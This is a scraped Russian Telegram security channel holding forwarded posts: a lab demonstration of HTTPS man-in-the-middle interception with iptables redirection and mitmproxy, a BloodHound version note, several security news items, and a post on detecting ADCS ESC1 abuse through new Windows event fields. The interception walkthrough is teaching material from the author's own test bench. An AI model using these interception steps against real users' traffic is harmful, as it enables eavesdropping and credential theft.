Forwarded from REDtalk (Alexey)
Привет! ⌨️
Когда-то давно я делал🔗 пост про сертификаты и замочек в браузере слева от адресной строки. В комментариях был вопрос про виды защит браузера от mitm-атак. Не прошло и года (прошло), как я сделал стенд для их проверки. Далее покажу простой перехват https-трафика практически без использования специализированных инструментов, а также посмотрим на сработки встроенных механизмов защиты в браузер.
Стенд состоит из двух машин - Windows 10 и управляемый роутер из линукса:
На счет роутера я преувеличил. В данном случае это сетевой мост (перенаправляет трафик с одного интерфейса на другой) превратить linux в сетевой мост очень просто:
Мост готов, на винде тоже ставим адрес 10.13.37.11/24 и будет выход и интернет.
Теперь можно перехватывать https:
Как показано на гифке, перезагрузки страницы работает mitm-прокси, из-за чего браузер на уже посещенную страницу выдает ошибку net::ERR_CERT_AUTHORITY_INVALID и не даёт более ничего сделать, а вот на непосещенную ранее страницу алертит на самоподписанный сертификат, и ничего более.
В 9 случаев из 10 пользователь скорее всего проигнорирует это предупреждение. А если это какой-то внутренний ресурс, у которого тоже самоподписанный сертификат, то тут соответствие никто и проверить не будет😏
Когда-то давно я делал
Стенд состоит из двух машин - Windows 10 и управляемый роутер из линукса:
[Windows10] - (ens37)[Linux](ens33) - [Интернет] # роутер используется для MITM-атак.
На счет роутера я преувеличил. В данном случае это сетевой мост (перенаправляет трафик с одного интерфейса на другой) превратить linux в сетевой мост очень просто:
# Включаем редирект
echo 1 > /proc/sys/net/ipv4/ip_forward
# Чистим таблицы
iptables -F
iptables -t nat -F
iptables -X
iptables -t nat -X
# Создаем NAT и перенаправление трафика между интерфейсами
iptables -t nat -A POSTROUTING -o ens33 -j MASQUERADE
iptables -A FORWARD -i ens37 -o ens33 -j ACCEPT
iptables -A FORWARD -i ens33 -o ens37 -m state --state RELATED,ESTABLISHED -j ACCEPT
# Ставим ip-адрес на ens37. ens33 Получает его по dhcp
ip addr add 10.13.37.10/24 dev ens37
# Примечание. NetworkManager может сбрасывать заданный адрес, поэтому
# на время эксперимента его лучше отключить
Мост готов, на винде тоже ставим адрес 10.13.37.11/24 и будет выход и интернет.
Теперь можно перехватывать https:
# Редиректим любой 443 порт на 127.0.0.1:443
iptables -t nat -A PREROUTING -i ens37 -p tcp --dport 443 -j REDIRECT --to-port 443
# Запускаем mitmproxy на прослушку и редирект трафика на read.pyfffe.site и смотрим на вывод
# 212.67.10.54 это ip read.pyfffe.site
mitmproxy -p 443 --mode reverse:https://212.67.10.54:443 --showhost --ssl-insecure
Как показано на гифке, перезагрузки страницы работает mitm-прокси, из-за чего браузер на уже посещенную страницу выдает ошибку net::ERR_CERT_AUTHORITY_INVALID и не даёт более ничего сделать, а вот на непосещенную ранее страницу алертит на самоподписанный сертификат, и ничего более.
В 9 случаев из 10 пользователь скорее всего проигнорирует это предупреждение. А если это какой-то внутренний ресурс, у которого тоже самоподписанный сертификат, то тут соответствие никто и проверить не будет
Please open Telegram to view this post
VIEW IN TELEGRAM
Всем хак 👾
Все знакомы или хотя бы слышали про BloodHound?
BloodHound — инструмент для анализа связей в Active Directory. У него есть две версии:
Legacy — старая версия с классическим интерфейсом и ограниченной функциональностью.
CE (Community Edition) — обновлённая бесплатная версия с улучшённым UI, новыми возможностями и активной поддержкой сообщества.
Новички не всегда знают о разнице между версиями.
Раньше в Kali по умолчанию стояла Legacy-версия. Вчера мне понадобился BloodHound, и по привычке я установил пакет; пришлось немного поколдовать с запуском, и в итоге вместо ожидаемой Legacy получил CE-версию.
Мой вывод: имеет смысл переходить на современные, обновлённые инструменты — они чаще поддерживаются, содержат исправления безопасности и новые полезные функции. (Но есть исключения)
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Все знакомы или хотя бы слышали про BloodHound?
BloodHound — инструмент для анализа связей в Active Directory. У него есть две версии:
Legacy — старая версия с классическим интерфейсом и ограниченной функциональностью.
CE (Community Edition) — обновлённая бесплатная версия с улучшённым UI, новыми возможностями и активной поддержкой сообщества.
Новички не всегда знают о разнице между версиями.
Раньше в Kali по умолчанию стояла Legacy-версия. Вчера мне понадобился BloodHound, и по привычке я установил пакет; пришлось немного поколдовать с запуском, и в итоге вместо ожидаемой Legacy получил CE-версию.
Мой вывод: имеет смысл переходить на современные, обновлённые инструменты — они чаще поддерживаются, содержат исправления безопасности и новые полезные функции. (Но есть исключения)
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
❤1
www.opennet.ru
Опубликована платформа Node.js 25.0.0
Состоялся релиз Node.js 25.0.0, платформы для выполнения сетевых приложений на языке JavaScript. Node.js 25.0 отнесён к промежуточным веткам, сопровождение которых осуществляется в течение 7 месяцев (до июня 2026 года). В ближайшие дни будет завершена стабилизация…
🔗Ссылка:
https://opennet.ru/64077/
https://opennet.ru/64077/
www.opennet.ru
Взлом сайта Xubuntu с заменой ссылок на странице загрузки на вредоносное ПО
Официальный сайт дистрибутива Xubuntu скомпрометирован неизвестными злоумышленниками, которые на странице загрузки дистрибутива поменяли ссылки, ведущие на торренты, на файл "https://xubuntu.org/wp-content/Xubuntu-Safe-Download.zip". В итоге на странице загрузки…
🔗Ссылка:
https://opennet.ru/64079/
https://opennet.ru/64079/
Forwarded from AP Security
#soc #tools
Windows Security Events Terminal🔍
Комплексный инструмент, облегчающий поиск событий безопасности Windows и их фильтрацию.
🌟 Ознакомиться с исходниками утилиты можно по следующей ссылке.
Windows Security Events Terminal
Комплексный инструмент, облегчающий поиск событий безопасности Windows и их фильтрацию.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍3🔥1
Forwarded from purple shift
Мы часто видим, что в различных статьях по детектированию техник повышения привилегий с использованием ADCS (ESC-атаки) авторы до сих пор используют старый формат событий запросов сертификатов в ADCS (события 4886—4889). Однако в этом году компания Microsoft обновила формат упомянутых событий, и обновлённая схема даёт намного больше возможностей для написания хантов.
К сожалению, документации от Microsoft на эти события пока нет. Но несложно догадаться, какая информация содержится в каждом новом поле.
На скриншоте выше показано, как выглядит событие 4886 при запросе сертификата с использованием ESC1-уязвимого шаблона утилитой certify.
В обновлённом формате видно использованный шаблон,
А вот как выглядит теперь событие 4887 при таком запросе:
Здесь, помимо уже перечисленных полей, наконец-то появился Serial Number сертификата. Его можно использовать при поиске событий запроса TGT-билетов с выданным сертификатом (поле
К сожалению, до сих пор нет информации об IP-адресе клиента, ApplicationPolicy в запросе, SID Extension в выданном сертификате. Но даже с таким набором полей уже намного удобнее работать, и гораздо меньше необходимости обогащать события данными из БД ADCS.
Рекомендуем обновить ваши ADCS-сервера, если вы ещё этого не сделали, и проверить, настроены ли ваши аудиты. А мы в следующем посте расскажем, как можно использовать новые поля в хантах для детектирования ESC-атак.
К сожалению, документации от Microsoft на эти события пока нет. Но несложно догадаться, какая информация содержится в каждом новом поле.
На скриншоте выше показано, как выглядит событие 4886 при запросе сертификата с использованием ESC1-уязвимого шаблона утилитой certify.
В обновлённом формате видно использованный шаблон,
subjectAltName (SAN) в CSR, RequestClientInfo с пользователем, хостом и даже процессом из COM-объекта, использованный протокол для запроса (RPC или DCOM) и т.д. А вот как выглядит теперь событие 4887 при таком запросе:
Certificate Services approved a certificate request and issued a certificate.
Request ID: 79
Requester: ESSOS\daenerys.targaryen
Attributes:
ccm:meereen.essos.local
Disposition: 3
SKI: 93 be 4b 84 64 d7 19 20 6e 94 82 4d 1f ed 86 a5 c1 2c 0e 09
Subject: CN=daenerys.targaryen, CN=Users, DC=essos, DC=local
Subject Alternative Name:
Other Name:
Principal Name=viserys.targaryen
Certificate Template: ESC1
Serial Number: 200000004f317b974a5431d29a00000000004f
Authentication Service: Kerberos
Authentication Level: Privacy
DCOMorRPC: DCOM
Здесь, помимо уже перечисленных полей, наконец-то появился Serial Number сертификата. Его можно использовать при поиске событий запроса TGT-билетов с выданным сертификатом (поле
CertSerialNumber). К сожалению, до сих пор нет информации об IP-адресе клиента, ApplicationPolicy в запросе, SID Extension в выданном сертификате. Но даже с таким набором полей уже намного удобнее работать, и гораздо меньше необходимости обогащать события данными из БД ADCS.
Рекомендуем обновить ваши ADCS-сервера, если вы ещё этого не сделали, и проверить, настроены ли ваши аудиты. А мы в следующем посте расскажем, как можно использовать новые поля в хантах для детектирования ESC-атак.
www.opennet.ru
Обновление VirtualBox 7.2.4 с устранением уязвимостей
Компания Oracle опубликовала корректирующий релиз системы виртуализации VirtualBox 7.2.2, в котором устранено 8 уязвимостей, подробности о которых пока не раскрываются. Указано только, что наиболее серьёзная проблема имеет уровень опасности 8.2 из 10. Кроме…
🔗Ссылка:
https://opennet.ru/64094/
https://opennet.ru/64094/